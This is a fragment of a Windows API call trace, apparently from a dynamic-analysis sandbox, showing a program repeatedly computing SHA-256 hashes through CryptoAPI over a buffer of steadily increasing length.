	[0197.056] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cde0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cde0, pdwDataLen=0x128aac) returned 1
	[0197.056] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.056] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.056] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.056] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.056] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0197.056] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ce08
	[0197.056] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ce08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ce08, pdwDataLen=0x128aac) returned 1
	[0197.056] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.056] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.056] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.057] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.057] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0197.057] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ce30
	[0197.057] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ce30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ce30, pdwDataLen=0x128aac) returned 1
	[0197.057] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.057] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.057] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.057] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.057] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0197.057] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ce58
	[0197.057] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ce58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ce58, pdwDataLen=0x128aac) returned 1
	[0197.057] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.057] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.057] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.058] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.058] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0197.058] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ce80
	[0197.058] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ce80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ce80, pdwDataLen=0x128aac) returned 1
	[0197.058] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.058] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.058] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.058] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.058] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0197.058] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cea8
	[0197.058] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cea8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cea8, pdwDataLen=0x128aac) returned 1
	[0197.058] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.058] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.058] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.059] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.059] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0197.059] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ced0
	[0197.059] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ced0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ced0, pdwDataLen=0x128aac) returned 1
	[0197.059] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.059] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.059] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.059] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.059] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0197.059] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cef8
	[0197.059] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cef8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cef8, pdwDataLen=0x128aac) returned 1
	[0197.059] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.059] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.059] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.107] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.107] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0197.107] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cf20
	[0197.107] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cf20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cf20, pdwDataLen=0x128aac) returned 1
	[0197.107] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.107] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.107] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.107] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.107] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0197.107] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cf48
	[0197.107] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cf48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cf48, pdwDataLen=0x128aac) returned 1
	[0197.107] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.107] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.107] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.108] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.108] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0197.108] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cf70
	[0197.108] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cf70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cf70, pdwDataLen=0x128aac) returned 1
	[0197.108] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.108] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.108] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.108] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.108] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0197.108] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cf98
	[0197.108] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230cf98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cf98, pdwDataLen=0x128aac) returned 1
	[0197.108] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.108] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.108] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.109] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.109] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0197.109] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230cfc0
	[0197.109] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230cfc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230cfc0, pdwDataLen=0x128aac) returned 1
	[0197.109] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.109] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.109] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.109] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.109] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0197.109] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263668
	[0197.109] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263668, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263668, pdwDataLen=0x128aac) returned 1
	[0197.109] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.109] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.109] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.110] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.110] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0197.110] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263730
	[0197.110] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263730, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263730, pdwDataLen=0x128aac) returned 1
	[0197.110] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.110] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.110] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.111] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.111] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0197.111] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2637a8
	[0197.111] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2637a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2637a8, pdwDataLen=0x128aac) returned 1
	[0197.111] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.111] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.111] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.112] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.112] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0197.112] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310de8
	[0197.112] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310de8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310de8, pdwDataLen=0x128aac) returned 1
	[0197.112] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.112] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.112] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.112] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.112] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0197.112] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310e10
	[0197.112] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2310e10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310e10, pdwDataLen=0x128aac) returned 1
	[0197.112] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.112] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.112] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.113] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.113] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0197.113] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23065a0
	[0197.113] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23065a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23065a0, pdwDataLen=0x128aac) returned 1
	[0197.113] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.113] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.113] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.113] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.113] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0197.113] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306500
	[0197.113] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2306500, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306500, pdwDataLen=0x128aac) returned 1
	[0197.113] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.113] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.113] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.114] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.114] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0197.114] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690060
	[0197.114] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690060, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690060, pdwDataLen=0x128aac) returned 1
	[0197.114] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.114] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.114] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.115] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.115] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0197.115] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690088
	[0197.115] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690088, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690088, pdwDataLen=0x128aac) returned 1
	[0197.115] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.115] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.115] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.115] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.115] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0197.115] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26900b0
	[0197.115] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26900b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26900b0, pdwDataLen=0x128aac) returned 1
	[0197.115] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.115] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.115] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.116] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.116] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0197.116] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26900d8
	[0197.116] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x26900d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26900d8, pdwDataLen=0x128aac) returned 1
	[0197.116] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.116] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.116] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.116] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.116] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0197.116] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690100
	[0197.116] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690100, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690100, pdwDataLen=0x128aac) returned 1
	[0197.116] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.116] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.116] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.117] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.117] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0197.117] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690128
	[0197.117] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690128, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690128, pdwDataLen=0x128aac) returned 1
	[0197.117] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.117] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
